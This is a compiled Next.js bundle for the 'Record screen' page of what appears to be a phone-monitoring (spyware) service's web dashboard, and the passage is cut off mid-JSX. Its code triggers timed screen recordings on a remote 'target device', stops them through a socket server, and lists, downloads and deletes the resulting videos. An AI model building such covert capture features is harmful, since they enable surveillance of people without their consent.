(self["webpackChunk_N_E"] = self["webpackChunk_N_E"] || []).push([[8568],{

/***/ 64066:
/***/ (function(__unused_webpack_module, __unused_webpack_exports, __webpack_require__) {


    (window.__NEXT_P = window.__NEXT_P || []).push([
      "/android/local/record-screen",
      function () {
        return __webpack_require__(18057);
      }
    ]);
    if(false) {}
  

/***/ }),

/***/ 19630:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export */ __webpack_require__.d(__webpack_exports__, {
/* harmony export */   "Cq": function() { return /* binding */ getCode; },
/* harmony export */   "DF": function() { return /* binding */ androidLocalRefresh; },
/* harmony export */   "LW": function() { return /* binding */ localShooting; },
/* harmony export */   "UC": function() { return /* binding */ localPhoneSendEmailios; },
/* harmony export */   "ds": function() { return /* binding */ CheckCode; },
/* harmony export */   "gM": function() { return /* binding */ checkAppLastVersion; },
/* harmony export */   "lm": function() { return /* binding */ localPhoneSendEmailandroid; },
/* harmony export */   "sk": function() { return /* binding */ setBlock; },
/* harmony export */   "zW": function() { return /* binding */ androidLocalRecordQuestionRrecycleGet; }
/* harmony export */ });
/* unused harmony exports localPhoneSendEmail, androidLocalAsyncDataStatus */
/* harmony import */ var _src_utils_request__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(93103);
/* harmony import */ var qs__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(80129);
/* harmony import */ var qs__WEBPACK_IMPORTED_MODULE_1___default = /*#__PURE__*/__webpack_require__.n(qs__WEBPACK_IMPORTED_MODULE_1__);


//apk注册码
const getCode = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].get */ .Z.get("/api/user/get-device-code", options);
//apk验证注册码是否绑定
const CheckCode = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].post */ .Z.post("/api/user/check-device-code", options);
// 判断本地app是否最新版本
const checkAppLastVersion = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].get */ .Z.get("/api/get-app/version?" + qs__WEBPACK_IMPORTED_MODULE_1___default().stringify(options));
// 本地app请求刷新
const androidLocalRefresh = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].post */ .Z.post("/api/device/android-local-reset-data", options);
// 本地app录制状态获取
const androidLocalRecordQuestionRrecycleGet = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].get */ .Z.get("/api/device/android-local-record-question-recycle-get?" + qs__WEBPACK_IMPORTED_MODULE_1___default().stringify(options));
//AndRoid-Local选择moto机型时发送邮件
const localPhoneSendEmail = (options)=>axios.post("/api/definition/target-phone", options);
const localPhoneSendEmailios = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].post */ .Z.post("/api/definition/target-ios-phone", options);
const localPhoneSendEmailandroid = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].post */ .Z.post("/api/definition/target-android-phone", options);
//Block app && Block wifi获取应用解锁状态
const setBlock = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].post */ .Z.post("/api/device/android-local-device-type-limit", options);
//take photos && record video轮训消息
const localShooting = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].get */ .Z.get("/api/a-local-shooting-log", {
        params: options
    });
// apk同步下载数据轮询状态
const androidLocalAsyncDataStatus = (options)=>axios.post("/api/device/android-local-async-data-status", options);


/***/ }),

/***/ 21609:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(85893);
/* harmony import */ var _iconify_react__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(1954);
// ** Icon Imports


const IconifyIcon = (param)=>{
    let { icon , ...rest } = param;
    return /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(_iconify_react__WEBPACK_IMPORTED_MODULE_1__/* .Icon */ .JO, {
        icon: icon,
        fontSize: "1.5rem",
        ...rest
    });
};
/* harmony default export */ __webpack_exports__["Z"] = (IconifyIcon);


/***/ }),

/***/ 18057:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
__webpack_require__.r(__webpack_exports__);
/* harmony import */ var react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(85893);
/* harmony import */ var _mui_material_styles__WEBPACK_IMPORTED_MODULE_3__ = __webpack_require__(90948);
/* harmony import */ var antd__WEBPACK_IMPORTED_MODULE_18__ = __webpack_require__(15378);
/* harmony import */ var antd__WEBPACK_IMPORTED_MODULE_19__ = __webpack_require__(2453);
/* harmony import */ var antd__WEBPACK_IMPORTED_MODULE_23__ = __webpack_require__(84567);
/* harmony import */ var src_core_components_icon__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(21609);
/* harmony import */ var framer_motion__WEBPACK_IMPORTED_MODULE_21__ = __webpack_require__(50607);
/* harmony import */ var _index_module_scss__WEBPACK_IMPORTED_MODULE_22__ = __webpack_require__(52789);
/* harmony import */ var _index_module_scss__WEBPACK_IMPORTED_MODULE_22___default = /*#__PURE__*/__webpack_require__.n(_index_module_scss__WEBPACK_IMPORTED_MODULE_22__);
/* harmony import */ var react_perfect_scrollbar__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(51964);
/* harmony import */ var react_perfect_scrollbar__WEBPACK_IMPORTED_MODULE_2___default = /*#__PURE__*/__webpack_require__.n(react_perfect_scrollbar__WEBPACK_IMPORTED_MODULE_2__);
/* harmony import */ var dayjs__WEBPACK_IMPORTED_MODULE_4__ = __webpack_require__(27484);
/* harmony import */ var dayjs__WEBPACK_IMPORTED_MODULE_4___default = /*#__PURE__*/__webpack_require__.n(dayjs__WEBPACK_IMPORTED_MODULE_4__);
/* harmony import */ var src_api_android__WEBPACK_IMPORTED_MODULE_5__ = __webpack_require__(19630);
/* harmony import */ var react__WEBPACK_IMPORTED_MODULE_6__ = __webpack_require__(67294);
/* harmony import */ var src_api_dashboard__WEBPACK_IMPORTED_MODULE_7__ = __webpack_require__(95629);
/* harmony import */ var next_image__WEBPACK_IMPORTED_MODULE_8__ = __webpack_require__(25675);
/* harmony import */ var next_image__WEBPACK_IMPORTED_MODULE_8___default = /*#__PURE__*/__webpack_require__.n(next_image__WEBPACK_IMPORTED_MODULE_8__);
/* harmony import */ var react_redux__WEBPACK_IMPORTED_MODULE_9__ = __webpack_require__(9473);
/* harmony import */ var src_store_apps_Common__WEBPACK_IMPORTED_MODULE_10__ = __webpack_require__(34745);
/* harmony import */ var socket_io_client__WEBPACK_IMPORTED_MODULE_11__ = __webpack_require__(67642);
/* harmony import */ var src_utils_i18n__WEBPACK_IMPORTED_MODULE_12__ = __webpack_require__(61906);
/* harmony import */ var src_components_Message__WEBPACK_IMPORTED_MODULE_13__ = __webpack_require__(29143);
/* harmony import */ var src_hooks_useAndroidDevicePagedData__WEBPACK_IMPORTED_MODULE_14__ = __webpack_require__(76039);
/* harmony import */ var src_components_ContentLoading__WEBPACK_IMPORTED_MODULE_15__ = __webpack_require__(74743);
/* harmony import */ var src_components_DateRangeFilter__WEBPACK_IMPORTED_MODULE_16__ = __webpack_require__(99442);
/* harmony import */ var src_utils_dateRangeParams__WEBPACK_IMPORTED_MODULE_17__ = __webpack_require__(31909);
/* harmony import */ var src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_20__ = __webpack_require__(26771);









const PerfectScrollbar = (0,_mui_material_styles__WEBPACK_IMPORTED_MODULE_3__/* ["default"] */ .ZP)((react_perfect_scrollbar__WEBPACK_IMPORTED_MODULE_2___default()))((param)=>{
    let { theme  } = param;
    return {
        padding: theme.spacing(5)
    };
});























const { RangePicker  } = antd__WEBPACK_IMPORTED_MODULE_18__/* ["default"] */ .Z;
// 转换毫秒
function convertTimeStringToMilliseconds(timeString) {
    const regex = /^(\d+)([sm])$/;
    const match = timeString.match(regex);
    if (!match) {
        throw new Error("Invalid time string format");
    }
    const value = parseInt(match[1]);
    const unit = match[2];
    if (unit === "s") {
        return value * 1000 // 将秒转换为毫秒
        ;
    } else if (unit === "m") {
        return value * 60 * 1000 // 将分钟转换为毫秒
        ;
    } else {
        throw new Error("Invalid time unit");
    }
}
// 秒转分秒
function formatSeconds(seconds) {
    const minutes = Math.floor(seconds / 60);
    const remainingSeconds = seconds % 60;
    return ("0" + minutes).slice(-2) + ":" + ("0" + Math.floor(remainingSeconds)).slice(-2);
// return `${minutes}:${remainingSeconds}`
}
const RecordScreen = ()=>{
    const items = [
        {
            label: "15s",
            key: "15s"
        },
        {
            label: "30s",
            key: "30s"
        },
        {
            label: "1m",
            key: "1m"
        },
        {
            label: "2m",
            key: "2m"
        }
    ];
    const [messageApi, contextHolder] = antd__WEBPACK_IMPORTED_MODULE_19__/* ["default"].useMessage */ .ZP.useMessage();
    const { t  } = (0,src_utils_i18n__WEBPACK_IMPORTED_MODULE_12__/* .useTranslation */ .$G)("common");
    const { context , data: deviceData , loading: isLoading , loadNext , reload , setDateRange  } = (0,src_hooks_useAndroidDevicePagedData__WEBPACK_IMPORTED_MODULE_14__/* .useAndroidDevicePagedData */ .v)({
        source: "local",
        category: "LIVE_VIDEO",
        limit: 50
    });
    const contextRef = (0,react__WEBPACK_IMPORTED_MODULE_6__.useRef)(context);
    const countdownTimerRef = (0,react__WEBPACK_IMPORTED_MODULE_6__.useRef)(null);
    const recordTimeoutRef = (0,react__WEBPACK_IMPORTED_MODULE_6__.useRef)(null);
    const socketRef = (0,react__WEBPACK_IMPORTED_MODULE_6__.useRef)(null);
    const socketEmitTimeoutRef = (0,react__WEBPACK_IMPORTED_MODULE_6__.useRef)(null);
    contextRef.current = context;
    const recordStorageKey = (context === null || context === void 0 ? void 0 : context.identityKey) ? "type37:".concat(context.identityKey) : "type37";
    const recordNow = async (e)=>{
        var ref;
        const time = convertTimeStringToMilliseconds(e);
        const requestKey = context === null || context === void 0 ? void 0 : context.requestKey;
        const deviceId = context === null || context === void 0 ? void 0 : context.username;
        if (!requestKey || !deviceId) return;
        if (sessionStorage.getItem(recordStorageKey) && JSON.parse(sessionStorage.getItem(recordStorageKey)).date > new Date().getTime()) {
            return;
        }
        const result = await (0,src_api_android__WEBPACK_IMPORTED_MODULE_5__/* .androidLocalRefresh */ .DF)({
            device_id: deviceId,
            type: "37",
            time
        });
        if (((ref = contextRef.current) === null || ref === void 0 ? void 0 : ref.requestKey) === requestKey && result.code === 0) {
            sessionStorage.setItem(recordStorageKey, JSON.stringify({
                date: new Date().getTime() + time + 30000
            }));
            setBtnLoading(true);
            setCountdown(time / 1000);
            // 倒计时
            if (countdownTimerRef.current) clearInterval(countdownTimerRef.current);
            countdownTimerRef.current = setInterval(()=>{
                setCountdown((val)=>{
                    if (val == 0) {
                        clearInterval(countdownTimerRef.current);
                        countdownTimerRef.current = null;
                        return 0;
                    }
                    return val = val - 1;
                });
            }, 1000);
            getRecord(time, requestKey, deviceId, recordStorageKey);
        }
    };
    const [btnLoading, setBtnLoading] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)(false);
    // 数据
    const [allVideoData, setAllVideoData] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)([]);
    const [filterVideoData, setFilterVideoData] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)([]);
    const [videoDate, setVideoDate] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)([]);
    const [checkedDate, setCheckedDate] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)([]);
    const [checkedAll, setCheckAll] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)(false);
    const [vedioUrl, setVedioUrl] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)("");
    const [showRecordTime, setShowRecordTime] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)(false);
    const [showDate, setShowDate] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)(false);
    const [tips, setTips] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)("");
    const [date, setDate] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)([
        "All"
    ]);
    const rangeDom = (0,react__WEBPACK_IMPORTED_MODULE_6__.useRef)(null);
    const [from, setFrom] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)("");
    const [to, setTo] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)("");
    const [dates, setDates] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)([]);
    const [countdown, setCountdown] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)(0);
    (0,react__WEBPACK_IMPORTED_MODULE_6__.useEffect)(()=>{
        const mappedData = deviceData.map((row)=>({
                date: dayjs__WEBPACK_IMPORTED_MODULE_4___default()(row.date).format("YYYY-MM-DD HH:mm:ss"),
                url: "https://cos.spyx.com/".concat(row.thumb.url),
                cover: row.cover || null,
                id: row.date
            }));
        setAllVideoData(mappedData);
    }, [
        deviceData
    ]);
    // 滚动百分比
    const [scroll, setScroll] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)(0);
    // 获取滚动百分比
    (0,react__WEBPACK_IMPORTED_MODULE_6__.useEffect)(()=>{
        const handScroll = ()=>{
            if (dom.current) {
                const { scrollTop , scrollHeight , clientHeight  } = dom.current;
                const progress = scrollTop / (scrollHeight - clientHeight) * 100;
                setScroll(progress.toFixed(0));
            }
        };
        const currentRef = dom.current;
        if (currentRef) {
            currentRef.addEventListener("scroll", handScroll);
        }
        return ()=>{
            if (currentRef) {
                currentRef.removeEventListener("scroll", handScroll);
            }
        };
    }, []);
    // 监听滚动百分比
    (0,react__WEBPACK_IMPORTED_MODULE_6__.useEffect)(()=>{
        if (scroll >= 100) loadNext();
    }, [
        loadNext,
        scroll
    ]);
    (0,react__WEBPACK_IMPORTED_MODULE_6__.useEffect)(()=>{
        const interval = setInterval(()=>setBtnLoading(Boolean(sessionStorage.getItem(recordStorageKey))), 1000);
        return ()=>clearInterval(interval);
    }, [
        recordStorageKey
    ]);
    // 50秒后提示录制状态
    const getRecord = (time, requestKey, deviceId, storageKey)=>{
        if (recordTimeoutRef.current) clearTimeout(recordTimeoutRef.current);
        recordTimeoutRef.current = setTimeout(async ()=>{
            try {
                var ref;
                const result = await (0,src_api_android__WEBPACK_IMPORTED_MODULE_5__/* .androidLocalRecordQuestionRrecycleGet */ .zW)({
                    type: 37,
                    device_id: deviceId
                });
                if (((ref = contextRef.current) === null || ref === void 0 ? void 0 : ref.requestKey) !== requestKey) return;
                if (result.msg) {
                    reload();
                // setTips(result.msg)
                } else {
                    setTips("The target device is turned off or not connected to the network, please make sure it is turned on");
                }
            } catch (e) {
                var ref1;
                if (((ref1 = contextRef.current) === null || ref1 === void 0 ? void 0 : ref1.requestKey) === requestKey) {
                    setTips("The target device is turned off or not connected to the network, please make sure it is turned on");
                }
            } finally{
                sessionStorage.removeItem(storageKey);
                recordTimeoutRef.current = null;
            }
        }, time + 8000);
    };
    // 打开视频
    const [videoOpen, setVideoOpen] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)(false);
    const [currentVideo, setCurrentVideo] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)("");
    const audio = (url)=>{
        setCurrentVideo(url);
        setVideoOpen(true);
    };
    const dom = (0,react__WEBPACK_IMPORTED_MODULE_6__.useRef)(null);
    const [re, setRe] = (0,react__WEBPACK_IMPORTED_MODULE_6__.useState)(true);
    (0,react__WEBPACK_IMPORTED_MODULE_6__.useEffect)(()=>{
        if (filterVideoData.length === 0 || filterVideoData[0].img) return;
        const _dateList = [];
        for(const i in filterVideoData){
            var ref;
            if ((ref = filterVideoData[i].cover) === null || ref === void 0 ? void 0 : ref.url) {
                setFilterVideoData((val)=>{
                    val[i].img = "https://cos.spyx.com/".concat(filterVideoData[i].cover.url);
                    // 设置多选框值
                    val[i].checked = false;
                    return [
                        ...val
                    ];
                });
            } else {
                // 设置封面
                const video = document.createElement("video");
                video.currentTime = 1;
                video.src = filterVideoData[i].url;
                video.crossOrigin = "Anonymous";
                video.addEventListener("loadeddata", function() {
                    let canvas = document.createElement("canvas");
                    canvas.width = video.videoWidth > video.videoHeight ? video.videoWidth : video.videoHeight;
                    canvas.height = video.videoWidth > video.videoHeight ? video.videoWidth : video.videoHeight;
                    let ctx = canvas.getContext("2d");
                    ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
                    setFilterVideoData((val)=>{
                        val[i].img = canvas.toDataURL("image/png");
                        // 设置多选框值
                        val[i].checked = false;
                        return [
                            ...val
                        ];
                    });
                });
            }
            // 存储日期
            const _date = filterVideoData[i].date.split(" ")[0];
            if (!_dateList.includes(_date)) {
                _dateList.push(_date);
            }
        }
        setVideoDate([
            ..._dateList
        ]);
    }, [
        filterVideoData
    ]);
    // all checked改变
    const onChangeCheckedAll = (e)=>{
        setCheckAll(e.target.checked);
        setFilterVideoData((val)=>{
            for (const item of val){
                item.checked = e.target.checked;
            }
            return [
                ...val
            ];
        });
        setCheckedDate((val)=>{
            if (e.target.checked) {
                for (const item of filterVideoData){
                    if (!val.includes(item.date.split(" ")[0])) val.push(item.date.split(" ")[0]);
                }
            } else {
                val = [];
            }
            return [
                ...val
            ];
        });
    };
    // 日期checked改变
    const onChangeDateChecked = (e, item)=>{
        if (e.target.checked) {
            setCheckedDate((val)=>{
                if (!val.includes(item)) return [
                    ...val,
                    item
                ];
                return val;
            });
            const _arr = [];
            setFilterVideoData((val)=>{
                for (const _item of val){
                    if (_item.date.split(" ")[0] === item) _item.checked = true;
                    _arr.push(_item.checked);
                }
                if (!_arr.includes(false)) setCheckAll(true);
                return [
                    ...val
                ];
            });
        } else {
            setCheckedDate((val)=>{
                return val.filter((item1)=>item1 !== item);
            });
            setFilterVideoData((val)=>{
                for (const _item of val){
                    if (_item.date.split(" ")[0] === item) _item.checked = false;
                }
                return [
                    ...val
                ];
            });
            setCheckAll(false);
        }
    };
    // 时间checked改变
    const onChangeChecked = (e, i)=>{
        ;
        setFilterVideoData((val)=>{
            val[i].checked = e.target.checked;
            const _arr = [];
            if (!e.target.checked) {
                setCheckedDate((val2)=>val2.filter((item1)=>item1 !== val[i].date.split(" ")[0]));
                setCheckAll(false);
            } else {
                const _arr2 = [];
                for (const _item of val){
                    if (_item.date.split(" ")[0] === val[i].date.split(" ")[0]) {
                        _arr.push(_item.checked);
                    }
                    _arr2.push(_item.checked);
                }
                if (!_arr.includes(false)) setCheckedDate((_val)=>[
                        ..._val,
                        val[i].date.split(" ")[0]
                    ]);
                if (!_arr2.includes(false)) setCheckAll(true);
            }
            return [
                ...val
            ];
        });
    };
    // 存储日期
    const computeDate = (val)=>{
        const _dateList = [];
        for (const item of val){
            const _date = item.date.split(" ")[0];
            if (!_dateList.includes(_date)) {
                _dateList.push(_date);
            }
        }
        setVideoDate([
            ..._dateList
        ]);
    };
    // 下载视频
    const downloadVideo = (url)=>{
        const _url = url;
        fetch(url).then((res)=>res.blob()).then((blob)=>{
            const a = document.createElement("a");
            document.body.appendChild(a);
            a.style.display = "none";
            const url = window.URL.createObjectURL(blob);
            a.href = url;
            const _arr = _url.split("/");
            a.download = _arr[_arr.length - 1];
            a.click();
            document.body.removeChild(a);
            window.URL.revokeObjectURL(url);
        });
    };
    // 日期变化 -> 交给接口按日期重新拉取（列表不再是「只筛已加载的那几十条」）
    (0,react__WEBPACK_IMPORTED_MODULE_6__.useEffect)(()=>{
        if (date.length === 1 && date[0] !== "All") {
            // 快捷选项：换算成接口区间
            const { startTime , endTime  } = (0,src_utils_dateRangeParams__WEBPACK_IMPORTED_MODULE_17__/* .buildPresetTimeParams */ .z6)(date[0]);
            setDateRange({
                startTime,
                endTime
            });
        } else if (date.length === 2) {
            // 自定义区间
            const { startTime: startTime1 , endTime: endTime1  } = (0,src_utils_dateRangeParams__WEBPACK_IMPORTED_MODULE_17__/* .buildTimeParams */ .W2)(date);
            setDateRange({
                startTime: startTime1,
                endTime: endTime1
            });
        } else {
            // All：清除筛选
            setDateRange(null);
        }
    }, [
        date,
        setDateRange
    ]);
    // 本地兜底筛选：接口按日期返回后，用同一区间再筛一次（接口不支持该参数时仍然可用）
    const filterDate = (0,react__WEBPACK_IMPORTED_MODULE_6__.useCallback)((ago, now)=>{
        if (!ago || !now) {
            setFilterVideoData([
                ...allVideoData
            ]);
            computeDate([
                ...allVideoData
            ]);
        } else {
            const _value = JSON.parse(JSON.stringify(allVideoData));
            const _arr = [];
            for (const item of _value){
                const _time = dayjs__WEBPACK_IMPORTED_MODULE_4___default()(item.date).valueOf();
                if (ago <= _time && _time <= now) {
                    _arr.push(item);
                }
            }
            setFilterVideoData([
                ..._arr
            ]);
            computeDate([
                ..._arr
            ]);
        }
    }, [
        allVideoData
    ]);
    // 数据变化（含接口返回）后刷新展示列表
    (0,react__WEBPACK_IMPORTED_MODULE_6__.useEffect)(()=>{
        if (date.length === 1 && date[0] !== "All") {
            const { startTime , endTime  } = (0,src_utils_dateRangeParams__WEBPACK_IMPORTED_MODULE_17__/* .buildPresetTimeParams */ .z6)(date[0]);
            filterDate(startTime, endTime);
        } else if (date.length === 2) {
            const { startTime: startTime1 , endTime: endTime1  } = (0,src_utils_dateRangeParams__WEBPACK_IMPORTED_MODULE_17__/* .buildTimeParams */ .W2)(date);
            filterDate(startTime1, endTime1);
        } else {
            filterDate();
        }
    }, [
        date,
        filterDate
    ]);
    const onApply = ()=>{
        if (!from || !to) return;
        setDate([
            from,
            to
        ]);
        setShowDate(false);
    };
    const del = async ()=>{
        const requestKey = context === null || context === void 0 ? void 0 : context.requestKey;
        const deviceId = context === null || context === void 0 ? void 0 : context.username;
        if (!requestKey || !deviceId) {
            ;
            return;
        }
        const idList = filterVideoData.filter((item)=>item.checked).map((item)=>item.id);
        if (idList.length === 0) return;
        const username = (0,src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_20__/* .readUserEmail */ .t)();
        if (!username) {
            ;
            return;
        }
        try {
            var ref, ref1;
            const res = await (0,src_api_dashboard__WEBPACK_IMPORTED_MODULE_7__/* .delFile */ ._d)({
                username,
                params: {
                    category: "LIVE_VIDEO",
                    deviceUdid: deviceId,
                    idList
                }
            });
            if (((ref = contextRef.current) === null || ref === void 0 ? void 0 : ref.requestKey) !== requestKey) return;
            if (res === null || res === void 0 ? void 0 : (ref1 = res.data) === null || ref1 === void 0 ? void 0 : ref1.status) {
                (0,src_components_Message__WEBPACK_IMPORTED_MODULE_13__/* .messageInfo */ .B)(t("Delete success"));
                reload();
            } else {
                ;
                antd__WEBPACK_IMPORTED_MODULE_19__/* ["default"].error */ .ZP.error(t("Delete failed"));
            }
        } catch (error) {
            ;
            antd__WEBPACK_IMPORTED_MODULE_19__/* ["default"].error */ .ZP.error(t("Delete failed"));
        }
    };
    const dispatch = (0,react_redux__WEBPACK_IMPORTED_MODULE_9__/* .useDispatch */ .I0)();
    (0,react__WEBPACK_IMPORTED_MODULE_6__.useEffect)(()=>{
        const title = t("Record screen");
        dispatch((0,src_store_apps_Common__WEBPACK_IMPORTED_MODULE_10__/* .setCurrentTab */ .Lw)(title));
        return ()=>dispatch((0,src_store_apps_Common__WEBPACK_IMPORTED_MODULE_10__/* .setCurrentTab */ .Lw)(""));
    }, [
        dispatch,
        t
    ]);
    // 停止录制
    const stop = ()=>{
        const requestKey = context === null || context === void 0 ? void 0 : context.requestKey;
        const deviceId = context === null || context === void 0 ? void 0 : context.username;
        if (!requestKey || !deviceId || socketRef.current) return;
        const currentSocket = (0,socket_io_client__WEBPACK_IMPORTED_MODULE_11__/* ["default"] */ .ZP)("https://test-ms-service.gbyte.com.cn");
        socketRef.current = currentSocket;
        const senderId = deviceId;
        const receiverId = deviceId;
        const message = {
            handleType: "live",
            type: "37",
            id: deviceId
        };
        currentSocket.on("connect", ()=>{
            var ref;
            if (((ref = contextRef.current) === null || ref === void 0 ? void 0 : ref.requestKey) !== requestKey) {
                currentSocket.disconnect();
                socketRef.current = null;
                return;
            }
            sessionStorage.removeItem(recordStorageKey);
            if (recordTimeoutRef.current) {
                clearTimeout(recordTimeoutRef.current);
                recordTimeoutRef.current = null;
            }
            if (countdownTimerRef.current) {
                clearInterval(countdownTimerRef.current);
                countdownTimerRef.current = null;
            }
            socketEmitTimeoutRef.current = setTimeout(()=>{
                currentSocket.emit("private_message", {
                    senderId,
                    receiverId,
                    message
                });
                currentSocket.disconnect();
                socketRef.current = null;
                socketEmitTimeoutRef.current = null;
            }, 1000);
        });
    };
    (0,react__WEBPACK_IMPORTED_MODULE_6__.useEffect)(()=>{
        return ()=>{
            if (countdownTimerRef.current) clearInterval(countdownTimerRef.current);
            if (recordTimeoutRef.current) clearTimeout(recordTimeoutRef.current);
            if (socketEmitTimeoutRef.current) clearTimeout(socketEmitTimeoutRef.current);
            if (socketRef.current) socketRef.current.disconnect();
            countdownTimerRef.current = null;
            recordTimeoutRef.current = null;
            socketEmitTimeoutRef.current = null;
            socketRef.current = null;
        };
    }, [
        context === null || context === void 0 ? void 0 : context.requestKey
    ]);
    // 日期按钮
    const button1 = ()=>/*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
            className: "w-[calc(50%-5px)] h-[35px] bg-[#F8F8F8] border border-[#E5E7EB] rounded-[8px] flex justify-center items-center cursor-pointer relative max-px-[10px] Blds:w-auto Blds:min-w-[172px]",
            onClick: (e)=>{
                e.stopPropagation();
                setShowDate((val)=>!val);
            },
            children: [
                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_8___default()), {
                    className: "ml-[2px]",
                    src: "/images/record-screen/calendar.svg",
                    width: 20,
                    height: 20,
                    alt: "calendar"
                }),
                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("span", {
                    className: "text-[14px] text-[#000] mr-[16px] ml-[5px]",
                    children: [
                        date.length === 1 && date[0],
                        date.length === 2 && /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)(react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.Fragment, {
                            children: [
                                date[0],
                                " ~ ",
                                date[1]
                            ]
                        })
                    ]
                }),
                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(framer_motion__WEBPACK_IMPORTED_MODULE_21__/* .motion.div */ .E.div, {
                    initial: {
                        rotate: 0
                    },
                    animate: {
                        rotate: showDate ? 180 : 0
                    },
                    transition: {
                        duration: 0.2
                    },
                    children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_8___default()), {
                        src: "/images/record-screen/drop-down.svg",
                        width: 20,
                        height: 20,
                        alt: "drop down"
                    })
                }),
                showDate && /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)(framer_motion__WEBPACK_IMPORTED_MODULE_21__/* .motion.div */ .E.div, {
                    initial: {
                        opacity: 0
                    },
                    animate: {
                        opacity: 1
                    },
                    transition: {
                        duration: 0.2
                    },
                    className: "w-full drop-shadow-[0_0_3px_rgba(0,0,0,0.1)] bg-[#FFF] rounded-[6px] flex flex-col text-[14px] text-[#666666] absolute top-[38px] p-[10px] z-30 relative",
                    onClick: (e)=>{
                        e.stopPropagation();
                    },
                    children: [
                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                            className: "border border-[#E5E5E5] rounded-[3px] text-[14px] text-[rgba(0,0,0,0.9)]",
                            children: [
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                    className: "py-[3px] px-[16px]",
                                    onClick: ()=>{
                                        setDate([
                                            "All"
                                        ]);
                                        setShowDate(false);
                                    },
                                    children: t("All")
                                }),
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                    className: "py-[3px] px-[16px]",
                                    onClick: ()=>{
                                        setDate([
                                            "Today"
                                        ]);
                                        setShowDate(false);
                                    },
                                    children: t("Today")
                                }),
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                    className: "py-[3px] px-[16px]",
                                    onClick: ()=>{
                                        setDate([
                                            "Last 7 days"
                                        ]);
                                        setShowDate(false);
                                    },
                                    children: t("Last 7 days")
                                }),
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                    className: "py-[3px] px-[16px]",
                                    onClick: ()=>{
                                        setDate([
                                            "Last 14 days"
                                        ]);
                                        setShowDate(false);
                                    },
                                    children: t("Last 14 days")
                                }),
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                    className: "py-[3px] px-[16px]",
                                    onClick: ()=>{
                                        setDate([
                                            "Last 30 days"
                                        ]);
                                        setShowDate(false);
                                    },
                                    children: t("Last 30 days")
                                }),
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                    className: "py-[3px] px-[16px]",
                                    onClick: ()=>{
                                        const currentDate = new Date();
                                        const xxDaysAgo = currentDate.setDate(currentDate.getDate() - 365);
                                        ;
                                        setDate([
                                            "Last Year"
                                        ]);
                                        setShowDate(false);
                                    },
                                    children: t("Last Year")
                                })
                            ]
                        }),
